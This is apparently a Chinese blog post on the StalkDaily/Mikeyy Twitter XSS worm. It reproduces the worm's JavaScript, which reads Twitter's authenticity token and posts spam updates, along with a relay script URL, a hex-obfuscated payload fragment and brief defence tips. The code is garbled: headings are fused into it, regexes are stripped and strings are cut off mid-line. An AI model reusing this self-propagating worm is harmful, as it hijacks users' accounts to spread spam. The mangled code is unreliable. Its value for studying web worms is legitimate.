这个Mikeyy家伙才17岁,为了在twitter给自己打广告弄的XSS蠕虫,这么恶毒的方式也用上了……
原始XSS Worm:
/**
 * XHConn: a minimal XMLHttpRequest wrapper (a widely copied 2005-era helper).
 * Tries the two ActiveX transports first, then the native XMLHttpRequest, and
 * exposes a single connect() method on the instance. Returns null when no
 * transport can be constructed.
 *
 * NOTE(review): the `感染方式:` ("infection method") text fused onto the
 * opening line appears to be a page heading captured by extraction, not part
 * of the script; JavaScript reads it as a statement label, so it does not
 * break parsing, but it should be ignored when reading the code.
 */
function XHConn() {感染方式:
// One transport object per XHConn instance; bComplete guards against
// fnDone firing more than once per request.
var xmlhttp, bComplete = false;
try {
xmlhttp = new ActiveXObject("Msxml2.XMLHTTP");
}
catch(e) {
try {
xmlhttp = new ActiveXObject("Microsoft.XMLHTTP");
}
catch(e) {
try {
xmlhttp = new XMLHttpRequest();
}
catch(e) {
// No usable transport in this environment.
xmlhttp = false;
}
}
}
// When called with `new`, a returned null is ignored by the language and the
// bare instance (without connect) comes back instead.
if (!xmlhttp) return null;
/**
 * Send one request on the shared transport.
 * @param {string} sURL - target URL
 * @param {string} sMethod - HTTP method, compared case-insensitively
 * @param {string} sVars - form-encoded variables: appended as the query
 *   string for GET, sent as the request body otherwise
 * @param {function} fnDone - invoked once with the transport object when
 *   readyState reaches 4
 * @returns {boolean} false if there is no transport or open()/send() threw,
 *   true once the request has been handed to the transport
 */
this.connect = function(sURL, sMethod, sVars, fnDone) {
if (!xmlhttp) return false;
bComplete = false;
sMethod = sMethod.toUpperCase();
try {
if (sMethod == "GET") {
// Variables travel in the query string; body is left empty.
xmlhttp.open(sMethod, sURL + "?" + sVars, true);
sVars = "";
}
else {
xmlhttp.open(sMethod, sURL, true);
// "Method" is not a defined HTTP request header; kept from the original
// helper. The content type matches the form-encoded sVars body.
xmlhttp.setRequestHeader("Method", "POST " + sURL + " HTTP/1.1");
xmlhttp.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
}
xmlhttp.onreadystatechange = function() {
// Deliver the completed response exactly once per connect() call.
if (xmlhttp.readyState == 4 && !bComplete) {
bComplete = true;
fnDone(xmlhttp);
}
};
xmlhttp.send(sVars);
}
catch(z) {
// Any failure in open()/setRequestHeader()/send() is reported as false.
return false;
}
return true;
};
// Explicit return; `new XHConn()` would yield the instance anyway.
return this;
}
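/**
 * Percent-encode a value for an application/x-www-form-urlencoded body,
 * mimicking PHP's urlencode(): encodeURIComponent() plus the characters it
 * leaves bare (' ( ) * ~ !) escaped, with spaces written as "+" rather than
 * "%20". Hex digits of every escape are upper-cased.
 *
 * Fixes relative to the original: `search` and `replace` were assigned
 * without declaration (implicit globals; a ReferenceError in strict mode),
 * the `histogram`/`tmp_arr` locals were unused, and a second `return ret`
 * was unreachable.
 *
 * @param {*} str - value to encode; converted with toString() first
 * @returns {string} the encoded form
 * @throws {TypeError} if str is null or undefined (toString() is called on it)
 */
function urlencode(str) {
  // Literal-substring replacement; avoids regex metacharacter issues for
  // search strings such as "(" or "*".
  var replaceLiteral = function(text, search, replacement) {
    return text.split(search).join(replacement);
  };
  // Applied after encodeURIComponent(), which is what produces the "%20"
  // sequences the last rule rewrites to "+".
  var extraEscapes = [
    ["'", '%27'],
    ['(', '%28'],
    [')', '%29'],
    ['*', '%2A'],
    ['~', '%7E'],
    ['!', '%21'],
    ['%20', '+']
  ];
  var ret = encodeURIComponent(str.toString());
  for (var i = 0; i < extraEscapes.length; i++) {
    ret = replaceLiteral(ret, extraEscapes[i][0], extraEscapes[i][1]);
  }
  // Normalise any lower-case hex escape to upper case (e.g. "%2f" -> "%2F").
  return ret.replace(/(\%([a-z0-9]{2}))/g, function(full, m1, m2) {
    return '%' + m2.toUpperCase();
  });
}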
// NOTE(review): the three lines below are mangled by page extraction — the
// RegExp literal after `new RegExp(` and the document.write() argument
// appear to have been stripped, so this span is not valid JavaScript as
// shown and does not reflect what the original script did here. `userreg`
// is assigned without a declaration (implicit global), and this `content`
// is shadowed by the local of the same name inside wait() below.
var content = document.documentElement.innerHTML;
userreg = new RegExp(/");
document.write("");
function wait() {
var content = document.documentElement.innerHTML;
authreg = new RegExp(/twttr.form_authenticity_token = '(.*)';/g);
var authtoken = authreg.exec(content);
authtoken = authtoken[1];
//alert(authtoken);
var Randomupdate = new Array();
randomUpdate[0] = "Dude, www.StalkDaily.com is awesome. What's the fuss?";
randomUpdate[1] = "Join www.StalkDaily.com everyone!";
randomUpdate[2] = "Woooo, www.StalkDaily.com :)";
randomUpdate[3] = "Virus!? What? www.StalkDaily.com is legit!";
randomUpdate[4] = "Wow...www.StalkDaily.com";
randomUpdate[5] = "@twitter www.StalkDaily.com";
var genRand = randomUpdate[Math.floor(Math.random() * randomUpdate.length)];
updateEncode = urlencode(genRand);
var xss = urlencode('http://www.stalkdaily.com">
在Twitter个人资料的location与web栏插入恶意代码,当其他用户浏览该用户的个人资料时,该XSS蠕虫就会触发。
XSS蠕虫中转站:http://content.ireel.com/xssjs.js
var _0x8da4=["\x4D\x73\x78\x6D\x6C\x32\x2E\x58\x4D\x4C\x48\x54\x54\x50","\x4D\x69\x63\x72\x6F\x73\x6F \x66\x74\x2E\x58\x4D\x4C\x48\x54\x54\x50","\x63\x6F\x6E\x6E\x65\x63\x74","\x74\x6F\x55\x70\x70 \x65\x72\x43\x61\x73\x65","\x47\x45\x54","\x3F","\x6F\x70\x65\x6E","","\x4D\x65\x74\ x68\x6F\x64","\x50\x4F\x53\x54\x20","\x20\x48\x54\x54\x50\x2F\x31\x2E\x31","\x73\x65\x74\x52 \x65\x71\x75\x65\x73\x74\x48\x65\x61\x64\x65\x72","\x43\x6F\x6E\x74\x65\x6E\x74\x2D\x54\x79\x70\ x65","\x61\x70\x70\x6C\x69\x63\x61\x74\x69\x6F\x6E\x2F\x78\x2D\x77\x77\x77\x2D\x66\x6F\x72\x6D\x2D \x75\x72\x6C\x65\x6E\x63\x6F\x64\x65\x64","安全防范:
1.更改hosts文件,屏蔽传染网址。
2.使用NoScript火狐扩展屏蔽恶意代码。
3.修改个人资料,删除恶意代码。